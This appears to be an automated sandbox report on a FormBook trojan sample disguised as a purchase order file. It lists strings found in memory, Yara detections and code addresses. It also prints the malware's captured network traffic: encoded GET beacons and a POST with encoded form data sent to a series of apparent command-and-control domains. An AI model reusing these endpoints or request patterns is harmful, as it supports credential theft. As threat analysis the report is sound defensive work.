            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000006DCE000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3735982398.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3734102221.00000000065F4000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003E34000.00000004.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000460E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.442d968fe56a55df4c76.css
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1594930658.0000000008540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
            Source: isoburn.exe, 0000000B.00000002.3728367666.0000000003559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: isoburn.exe, 0000000B.00000002.3728367666.0000000003559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: isoburn.exe, 0000000B.00000002.3728367666.0000000003559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: isoburn.exe, 0000000B.00000002.3728367666.0000000003534000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: isoburn.exe, 0000000B.00000002.3728367666.0000000003559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: isoburn.exe, 0000000B.00000002.3728367666.0000000003559000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: isoburn.exe, 0000000B.00000003.1537643020.0000000007D5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000006DCE000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3735982398.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3734102221.00000000065F4000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003E34000.00000004.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000460E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://pdds.quark.cn/download/stfile/rrxtuszryrsvrtzte/QuarkCloudDrive-v2.5.43-release-pckk
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru?target=_blank
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000006DCE000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3735982398.0000000007A50000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3734102221.00000000065F4000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.0000000003E34000.00000004.00000001.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.000000000460E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
            Source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: isoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: isoburn.exe, 0000000B.00000003.1540520793.0000000007E18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=&utm_medium=expired&utm_campaign
            Source: qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/service/prolong_period_anonymous?servtype=srv_hosting_ispmgr&amp;dname_or_ip=
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/ssl-certificate/?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/cloud/?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/geoip?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/myip?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/port-checker?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 0000000B.00000002.3734102221.0000000005FAC000.00000004.10000000.00040000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3732868452.00000000037EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/check_site?utm_source=&utm_medium=expired&utm_campaign
            Source: unknownHTTP traffic detected: POST /ahec/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.jones4deepriver.comOrigin: http://www.jones4deepriver.comReferer: http://www.jones4deepriver.com/ahec/Cache-Control: no-cacheContent-Length: 183Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4Data Raw: 4f 74 3d 77 6d 65 50 2b 49 44 38 61 47 58 35 78 6e 56 35 62 44 41 66 37 78 49 7a 4f 75 45 69 33 76 68 55 44 54 68 4f 64 73 2b 45 43 52 39 30 69 48 6e 4d 4a 37 56 53 61 50 61 74 71 4b 54 34 55 54 6e 36 35 71 2f 6d 67 71 6e 69 69 63 78 37 50 73 76 74 44 45 5a 65 54 44 51 7a 74 52 35 57 54 6d 6f 4b 61 6d 67 6e 52 66 53 7a 54 34 64 53 33 77 33 64 39 4f 42 67 43 51 35 57 6b 77 75 73 51 79 43 74 31 64 70 6e 63 65 52 4a 73 55 36 43 6e 68 59 78 61 57 44 34 75 45 70 63 72 6f 39 47 64 66 49 79 6a 6e 76 4f 75 78 34 73 31 48 30 6e 48 43 78 44 43 77 3d 3d Data Ascii: Ot=wmeP+ID8aGX5xnV5bDAf7xIzOuEi3vhUDThOds+ECR90iHnMJ7VSaPatqKT4UTn65q/mgqniicx7PsvtDEZeTDQztR5WTmoKamgnRfSzT4dS3w3d9OBgCQ5WkwusQyCt1dpnceRJsU6CnhYxaWD4uEpcro9GdfIyjnvOux4s1H0nHCxDCw==
            Source: unknownDNS traffic detected: queries for: www.alldaysslimmingstea.com
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=0lWeLq0ljZnDSWqKPiItN+dDtGaop8tJSpt/SUCn4seLkPj1kpVBncTOO8qbY1skp8kxUg4twvHodh//BlyQvVj0G3LunRoJLQ==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.alldaysslimmingstea.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=9k2v98v8fW7x5mtxcj8a5QMRCoEP1Px6NgJCH+u8B3tf6gDcFaFwcfLjsp7tbCeN6M+Gl5HR8oN4IorBb0piTBAHvy1fUTc2Bw==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.jones4deepriver.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=IVKkGpXtV1toVTOE4YlrK/DLoA9BOULGifHJVqVOgN7K+V/6a9WE/CA4RHgfE4yJ8GdRU2XQNCMfR2HSu9NM5VP3fUQbd2z87Q==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.poria.linkConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=MydpLo7WWyKQN3KSEM/46nakICary48nbscI2lMT8W/M5j1pmQABg8QwQndiOgkeUarM8fNOhSJ3XzKDSkOhi0CLYcLsXbR3hQ==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.makeinai.onlineConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=SEtDmKR01RO/v1cj8toEclhnh+z+cFCFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7dClcm7p6TyxSZVg==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.instantconvey.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=bB5JTYLqXbmN0Rh+5NINP+PQjDS0UbZCl3xm8ZfdPOYVrj3MpZEcwx/57KsfYAKqEjFN/H+DNeQWefm4mYcz+JoJDCs0w/OhmA==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.domainappraisalbot.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=DTrGbTEHMG6Y4mKy1Dn1KlGSTxAaPAt5CR5S23I4xf5AWU1NMecScwq/Pr/mUgt4GFrPBjE4MJyXMuu59XRudeX+UPGmLlgOAA==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.nesmalt.infoConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=UYUxSke5jkUMcYDKg5c5qeCNAmjygCX5uaIG43dC5thZqMprvLUeD5Feo3aTVHSupyfrGHzleQTbxGW3puedJJnHNv+xYZWaEw==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.611erhm.topConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=pHT1kOem2IT0Y9TOyYUVH8n+JKlTpsv3XSVhoxxlik7UiuURsLT/Jzy3sp/tZoydu20sa6TfNH7nZl1KjnhVFUdGE6T0LcUEcA==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.fam-scharf.netConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=AHFK2pjoxw5zzLKjgIeieoxyeFKGBXiFIXzrT8sRZEqLGYv6y8nhVjDsidhHFHxwb+HDFiGiPRNZnrHWQBMiJvor1pzBMUzxhg==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.magmadokum.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=nB1qtJANgieev8TNIXcafe3NbPYBnXyCXRyPWsB/WMzSWoyZdSlu5bXncPzzIIBEZ/2nP35zxbYs3CtalsMWA7WUc9X1BQW9lg==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.thecoloringbitch.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKsEfLNF+7YeihFeQ==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.altralogos.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=W415zxONlMY0LROALmBwVywFRuOF9MDUrzPBSWER7JgIGEVSpL5hn1DTAqCrj0fiYOesE/vl81lAGPaeX7agy8WUnV35Ak22aw==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.77moea.topConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.PO_YTWHDF3432.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.PO_YTWHDF3432.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3732735204.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3732837802.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.3732252302.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1371528010.0000000001E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3732619108.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 3.2.PO_YTWHDF3432.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 3.2.PO_YTWHDF3432.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3732735204.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3732837802.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.3732252302.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1371528010.0000000001E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3732619108.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: PO_YTWHDF3432.exe
            .NET source code contains very large array initializations
            Source: 0.2.PO_YTWHDF3432.exe.89f0000.14.raw.unpack, RFebBaClhEWIFvwxqU.csLarge array initialization: : array initializer size 9041
            Source: 0.2.PO_YTWHDF3432.exe.29b5318.3.raw.unpack, RFebBaClhEWIFvwxqU.csLarge array initialization: : array initializer size 9041
            Source: 0.2.PO_YTWHDF3432.exe.29e4b30.5.raw.unpack, RFebBaClhEWIFvwxqU.csLarge array initialization: : array initializer size 9041
            Source: PO_YTWHDF3432.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 3.2.PO_YTWHDF3432.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.PO_YTWHDF3432.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3732735204.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3732837802.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.3732252302.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1371528010.0000000001E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3732619108.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 0_2_04E7D9AC0_2_04E7D9AC
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 0_2_08A5B8C00_2_08A5B8C0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 0_2_08A500400_2_08A50040
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 0_2_08A547980_2_08A54798
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 0_2_08A5B8AF0_2_08A5B8AF
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 0_2_08A599900_2_08A59990
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 0_2_08A599780_2_08A59978
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 0_2_08A55C400_2_08A55C40
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_004010003_2_00401000
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040280B3_2_0040280B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_004028103_2_00402810
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040112B3_2_0040112B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_004011303_2_00401130
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_004101333_2_00410133
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040E1B33_2_0040E1B3
